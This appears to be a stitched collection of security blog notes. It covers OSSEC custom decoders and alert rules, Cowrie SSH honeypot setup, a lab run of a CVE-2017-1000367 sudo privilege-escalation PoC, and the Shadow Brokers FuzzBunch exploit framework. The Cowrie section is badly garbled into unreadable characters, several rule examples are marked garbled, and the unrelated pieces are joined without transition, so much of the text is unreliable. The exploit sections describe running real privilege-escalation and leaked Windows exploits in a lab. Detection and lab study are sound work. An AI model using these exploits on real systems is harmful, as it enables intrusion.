Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. Custom decoders
2.1 Adding a log source

Adding a log source is simple: edit /var/ossec/etc/ossec.conf.

For a local file, add:

<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

For a remote syslog source, add:

<remote>
<connection>syslog</connection>
<protocol>udp</protocol>
<port>2514</port>
<allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 Writing a custom decoder

Suppose there are two log lines:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

Analysed with ossec-logtest, they give:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

This shows that OSSEC normalizes a log line in two stages: pre-decoding and decoding.

Pre-decoding is built in: from any standard syslog line it extracts these four basic fields.

Timestamp: Jun 11 22:06:30

Hostname: 172.17.153.38/172.16.24.32

Program_name: /usr/bin/auditServerd

Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .

In the decoding stage, custom normalization is done by editing /var/ossec/etc/decoder.xml. For example, add this decoder to the file:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

Run /var/ossec/bin/ossec-logtest again:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

The line now matches the decoder named auditServerd, which identifies it as output of the auditServerd program.

On top of the auditServerd decoder, child decoders can be added to extract more information, e.g.:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>
<decoder name="auditServerd-login">
  <parent>auditServerd</parent>
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>
  <order>user,status,srcip,dstip,dstport</order>
</decoder>

Running /var/ossec/bin/ossec-logtest again now yields more fields:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEESS'
srcip: '172.17.153.36'
dstip: '172.17.153.

By configuring a regex of this kind the user extracts specific fields for later correlation. OSSEC has 14 built-in field names that a decoder can fill:

   - location - where the log came from (only on FTS)

   - srcuser  - extracts the source username

   - dstuser  - extracts the destination (target) username

   - user     - an alias to dstuser (only one of the two can be used)

   - srcip    - source ip

   - dstip    - dst ip

   - srcport  - source port

   - dstport  - destination port

   - protocol - protocol

   - id       - event id 

   - url      - url of the event

   - action   - event action (deny, drop, accept, etc)

   - status   - event status (success, failure, etc)

   - extra_data     - Any extra data
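As an added illustration of the two stages described above (not code from the original post or from OSSEC itself), the Python below performs pre-decoding of the syslog header and then applies the auditServerd parent and child decoders, with the regex and order taken from the decoder.xml entries shown. It is a simplified model of OSSEC's decoder matching (program_name is treated as a regular expression and only one level of child decoders is handled); the sample lines are the two from the post plus a constructed sshd line.

```python
import re

# Pre-decoding: the fixed syslog header every line carries.
SYSLOG_RE = re.compile(
    r"^(?P<timestamp>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) "
    r"(?P<hostname>\S+) "
    r"(?P<program_name>[^\[:]+?)(?:\[\d+\])?: "
    r"(?P<log>.*)$")

# Decoders as dicts, mirroring the decoder.xml entries above.
DECODERS = [
    {"name": "auditServerd", "program_name": "/usr/bin/auditServerd"},
    {"name": "auditServerd-login", "parent": "auditServerd",
     "regex": r"^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$",
     "order": ["user", "status", "srcip", "dstip", "dstport"]},
]


def pre_decode(line):
    """Phase 1: timestamp, hostname, program_name and log, or None."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def decode(line, decoders=DECODERS):
    """Phase 1 + Phase 2: the fields ossec-logtest would print, or None."""
    fields = pre_decode(line)
    if fields is None:
        return None
    fields["decoder"] = None
    parents = [d for d in decoders if "parent" not in d]
    parent = next((d for d in parents
                   if re.search(d["program_name"], fields["program_name"])), None)
    if parent is None:
        return fields            # "No decoder matched."
    fields["decoder"] = parent["name"]
    for child in (d for d in decoders if d.get("parent") == parent["name"]):
        m = re.match(child["regex"], fields["log"])   # offset="after_parent"
        if m:
            for name, value in zip(child["order"], m.groups()):
                fields["dstuser" if name == "user" else name] = value   # user is an alias
            break
    return fields


# Sample lines: the two from the post and a constructed sshd line.
LOG_OK = ("Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: "
          "User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .")
LOG_FAIL = LOG_OK.replace("SUCEESS", "PWD_ERROR")
LOG_SSHD = ("Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: "
            "Accepted publickey for root from 172.16.24.121 port 38720 ssh2")

if __name__ == "__main__":
    for line in (LOG_OK, LOG_FAIL, LOG_SSHD):
        print(decode(line))
```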

3. Custom alert rules

3.1 Rule file paths

Rule files live in /var/ossec/rules/ by default. To load a rule file it must be listed in /var/ossec/etc/ossec.conf; the default configuration is:

<ossec_config>  <!-- rules global entry -->
  <rules>
    <include>rules_config.xml</include>
    <include>pam_rules.xml</include>
    <include>sshd_rules.xml</include>
    <include>telnetd_rules.xml</include>
    <include>syslog_rules.xml</include>
    <include>arpwatch_rules.xml</include>
    ......
    <include>clam_av_rules.xml</include>
    <include>bro-ids_rules.xml</include>
    <include>dropbear_rules.xml</include>
    <include>local_rules.xml</include>
  </rules>
</ossec_config>  <!-- rules global entry -->

All rule files under /var/ossec/rules can instead be loaded with:

<ossec_config>
    <rules>
        <rule_dir pattern=".xml$">rules</rule_dir>
    </rules>
</ossec_config>

Decoders can likewise be loaded with decoder_dir, e.g.:

<ossec_config>
    <rules>
        <decoder_dir pattern=".xml$">rules/plugins/decoders</decoder_dir>
    </rules>
</ossec_config>

This adds every xml file under /var/ossec/rules/plugins/decoders as an OSSEC decoder.

For full configuration details and syntax, see:

http://ossec-docs.readthedocs.org/en/latest/syntax/head_ossec_config.rules.html#element-rule_dir

3.2 Configuring OSSEC alert rules

For example, to add alert rules for the program auditServerd, create a new rule file for auditServerd in the same style as the rule files that already exist in OSSEC. The file defines a base rule (level 0, noalert) bound to the auditServerd decoder and, under it, a child rule that matches the decoded login fields and raises a level 10 alert. The new file is then listed in /var/ossec/etc/ossec.conf with an <include> entry after local_rules.xml.

(The rule XML shown at this point is garbled in the source.)

Running /var/ossec/bin/ossec-logtest again gives:

**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
       hostname: '172.17.153.38/172.16.24.32'
       program_name: '/usr/bin/auditServerd'
       log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
       decoder: 'auditServerd'
       dstuser: 'blackrat'
       status: 'SUCEESS'
       srcip: '172.17.153.36'
       dstip: '172.17.153.38'
       dstport: '3333'

**Phase 3: Completed filtering (rules).
       Rule id: (garbled in the source)
       Level: '10'
       Description: (garbled in the source)
**Alert to be generated.

3.3 Frequency-based alert rules

Besides single-event rules, OSSEC can correlate events and alert on frequency, for example when the same source IP fails to log in five times within a short time window. This is expressed with the frequency and timeframe attributes on a rule that refers back to the single-event rule with <if_matched_sid> and restricts the count to one source with <same_source_ip />.

(The brute-force rule XML, the five repeated test lines and the ossec-logtest output for this section are garbled in the source; the recoverable fragments show frequency="5" and a description mentioning brute force.)
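The counting that a frequency rule performs can be modelled in a few lines; the Python below is an added example, not code from the original post or from OSSEC. It takes already-decoded events (timestamp, srcip, status) such as the auditServerd fields above, counts PWD_ERROR events per source IP inside a sliding timeframe, and alerts when the count reaches frequency. The 60-second window and the constructed event lists are assumptions, and OSSEC's exact counter behaviour (it may need one more event than frequency before firing) is not modelled.

```python
from collections import deque


def brute_force_alerts(events, frequency=5, timeframe=60):
    """Return (timestamp, srcip) each time `frequency` PWD_ERROR events from one
    srcip fall within `timeframe` seconds.

    events: iterable of (epoch_seconds, srcip, status) in time order, e.g. the
    decoded fields of the auditServerd lines above."""
    recent = {}    # srcip -> deque of failure timestamps still inside the window
    alerts = []
    for ts, srcip, status in events:
        if status != "PWD_ERROR":
            continue
        window = recent.setdefault(srcip, deque())
        window.append(ts)
        while window and ts - window[0] > timeframe:   # drop failures that aged out
            window.popleft()
        if len(window) >= frequency:
            alerts.append((ts, srcip))
            window.clear()   # start counting again after alerting, one alert per burst
    return alerts


# Constructed events: five failures in 20 s from one IP, five failures spread
# over six minutes from a second IP, and four failures mixed with successes
# from a third.
FAST = [(1000 + i * 5, "172.17.153.36", "PWD_ERROR") for i in range(5)]
SLOW = [(2000 + i * 90, "172.17.153.37", "PWD_ERROR") for i in range(5)]
MIXED = [(3000 + i, "172.17.153.38", "SUCEESS" if i % 2 else "PWD_ERROR") for i in range(8)]
EVENTS = sorted(FAST + SLOW + MIXED)

if __name__ == "__main__":
    print(brute_force_alerts(EVENTS))
```

Only the first IP trips the rule: the second produces the same five failures but never five inside one window, and the third never reaches five failures at all.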

【OSSEC蜜罐】Cowrie:源ecur/ Trules蜜罐

OSSECh2>0x01 简介r><2于cowrie开源ditSekippo戔文交互sth蜜罐以署W9网到事试OS集恶意IP递富密ule歗典和攻击件以署W914䑜到事试O测糄知和拖了击过6

对于/p>

3.2 Oh2>0x02 目廥署r><2于var/ossec.csth/les.xgt;

对于曰P3 .'22下rsyP3 .'22p>该条测试䉫提服务rultemctrt Clamavowrie与Kippo溠4持R!--动的配置叐动端口22p2需要新增o置d 'Sab #s22端口转斈22p2端口re class="prettyprint">[root@localhost ossec]#yumedoatu.dice ultemctrt al-peandn - sr, failu: Usocalhost ossec]#yumedoatu.dicefirewall-cocal-zone=ey for add-ing fai-33 .=33 .=2p:l =tc :7/03 .=2p22al-peandn - sr, failu: Usocalhost ossec]#yumedoatu.dicefirewall-cocal-peandn gnatual - idey for (default - ex  iincofaail:- ex  port l:- ex  prsysloES dhcpv6-clitus (HITEDI  03 . Jul 2/tc - sr  masquer> :re> - sr  ing fai-33 . Ju33 .=2p:l =tc :7/03 .=2p22:7/addr=- ex  icmp-bst kl:- ex  rich Tryi:- ex      : Usocalhost ossec]#yumedoatu.dicefirewall-cocal-okm/ad- sr, failu

如上斎目owriere class="prettyprint">[root@lyumre ctlog -y epel-okmeCom- sryumre ctlog -y gcc libffing.->pyincnng.->> <-sslng.->g/d pyincnnpip pycrypto- sraddnly ocowrieal6.hehe123- srgd -pt disincs.togd hub.comemichkm/ec]erhof/cowrie.gi - srlam.cl-Rocowrie:cowrieacowrie/- srldacowrie- srmvacowrie.cfg.t 33acowrie.cfg

用户逼辑cowrie.cfg

上斎掉gnaten_33 .'= 22p2。释re class="prettyprint">[root@lpip e ctlog -r .equirele_ds.txt

 

最h2>0x03 斍库目r><2于s="prettyprint">[root@localhost ossec]#re> icepip e ctlog mysql-pyincn: Usocalhost ossec]#re> iceyumre ctlog Oiadb-(or verOiadb-g.->Oiadb: Usocalhost ossec]#re> ice ultemctrt icemysqladmicl-urom 17d. Tryi hehe123

 

最终s="prettyprint">[root@lMOiaDB [(ocal)] < CREATE DATABASEacowrie/gr;rQuery OKirecrow affiles: (0.00 m 1 - exMOiaDB [cowrie] < port /home/cowrie/cowrie/g/e/sql/mysql.sql;- exMOiaDB [cowrie] < pam. Sab #s;- ex+----------- /tm+- ex| Tab #s_in_cowriea|- ex+----------- /tm+- ex| >Vin            a|- ex| clituss         a|- ex| dm.cm/ads       a|- ex| input           a|- ex| keyfinger[roots a|- ex| s<-sors         a|- ex| siluions        a|- ex| t">log          a|- ex+----------- /tm+- ex8crows in abor(0.00 m 1

用户逋试一下rcowrie.cfgs孅Omysql及语揂耐动owriere class="prettyprint">[root@localhost ossec]#cowrie]ce uacowrie- sr[cowrieost ossec]#cowrie]$ .amscanowriea codet use: 5Pyincns: 6tuy --&: 6onm - sr (pidld ruowrie: [twnatd  a--umask 0022al-pidmlinkec/brucanowrie.pidr/lomav.lowrie.e froowriea]..*

用户這斯ule记>最终s="prettyprint">[root@lMOiaDB [cowrie] < pkmect *72.17.>Vin;- ex+----+----------- +------ +------ +------ +------ ---- /tm+- ex| idr| siluion     a| , failua| e a| d. Tryi |ser lun 11          a|- ex+----+----------- +------ +------ +------ +------ ---- /tm+- ex| a1 |sc66e2505a393 |      a1 |scalh    a| hehe123 a| -14T199-13 23:58:48a|- ex+----+----------- +------ +------ +------ +------ ---- /tm+- execrow in abor(0.01 m 1

用户var/os可记>最终s="prettyprint">[root@lMOiaDB [cowrie] < pkmect *72.17.input;- ex+----+----------- +------ --------- +------ +------ +------ +- ex| idr| siluion     a| er lun 11          a| .ealma| , failua| input  a|- ex+----+----------- +------ --------- +------ +------ +------ +- ex| a1 |sc66e2505a393 | -14T199-13 23:58:51 |sNULL a|      a1 |swhoami a|- ex+----+----------- +------ --------- +------ +------ +------ +- execrow in abor(0.01 m 1

Files fetched by the attacker are recorded in the downloads table:

    MariaDB [cowrie]> select * from downloads\G
    *************************** 1. row ***************************
           id: 1
      session: c66e2505a393
    timestamp: 2017-09-14
          url: http://www.baidu.com/img/bd_logo1.png
      outfile: dl/4ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5
       shasum: 4ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5
    1 row in set (0.00 sec)

0x04 Other notes

data/userdb.txt controls which SSH credentials the honeypot accepts: a `!` entry rejects that password for the user, and `*` accepts any other password:

    $ cat data/userdb.txt
    root:x:!root
    root:x:!123456
    root:x:*

The txtcmds/ directory holds the static output returned for commands the fake shell does not emulate; each entry is a plain text file:

    $ file df
    df: ASCII text
    $ cat df
    Filesystem                                              Size  Used Avail Use% Mounted on
    rootfs                                                  4.7G  731M  3.8G  17% /
    udev                                                     10M     0   10M   0% /dev
    tmpfs                                                    25M  192K   25M   1% /run
    /dev/disk/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /
    tmpfs                                                   5.0M     0  5.0M   0% /run/lock
    tmpfs                                                   101M     0  101M   0% /run/shm

The dl/ directory holds the files the attacker downloaded with curl or wget, stored under their hash:

    # ls dl/
4ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5

bin/playlog replays a recorded tty session from log/tty/, so every action the attacker took can be reviewed and used to refine alert rules:

    $ bin/playlog log/tty/20170913-233922-21cf6e129ef5-0i.log

data/fs.pickle defines the fake filesystem layout and honeyfs/ supplies the contents of the files it exposes, for example the login banner:

    $ cat honeyfs/etc/issue
    Debian GNU/Linux 7 \n \l

log/cowrie.json is the JSON-format log and log/cowrie.log is the plain-text log.


CVE-2017-1000367: sudo local privilege escalation vulnerability

Vulnerability details

Check the installed sudo version:

    # rpm -qa | grep sudo
    sudo-1.8.6p7-16.el7.x86_64

Check the sudo rights of the unprivileged account (its name is not legible in the source and is shown as <user> below):

    $ grep <user> /etc/sudoers
    <user> ALL=(ALL) NOPASSWD: /usr/bin/sum


Check whether SELinux is enabled:

    $ getenforce
    Enforcing

Run the privilege-escalation PoC from https://github.com/c0d3z3r0/sudo-CVE-2017-1000367 and check the result:

    $ ll /etc/motd
    -rw-r--r--. 1 root root 106

As shown above, /etc/motd has been overwritten.

In August 2016 a hacker group calling itself "The Shadow Brokers" claimed to have stolen a large number of files from the Equation Group, the group said to be linked to the NSA (the US National Security Agency) and known for its highly sophisticated tooling, including a number of hidden exploits and hacking tools, and published part of them. The group kept the rest and offered it at auction to the highest bidder for 1 million bitcoin (worth nearly 500 million US dollars). On 8 April 2017 The Shadow Brokers released the password for the retained encrypted archive, and on the evening of 14 April 2017 it published a second batch of the retained files, including new hacking tools named OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit and others.

Affected Windows versions: Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2 and Windows Server 2012 SP0.

The leaked archive is split by target: the windows directory holds the Windows exploits, implants and payloads; swift holds material relating to banking (SWIFT) networks; oddjob holds the documentation for the ODDJOB backdoor.

Test environment (the address prefix is not legible in the source): a Kali machine (x.x.x.128), a Windows 2003 SP2 target (x.x.x.174) and a Windows XP SP3 target (x.x.x.176) with its firewall turned off, since the firewall blocks port 445.

FuzzBunch is the framework that drives the exploits. It resembles Metasploit, is Python-based (fb.py) and is run from the C:\shadowbrokers\windows directory.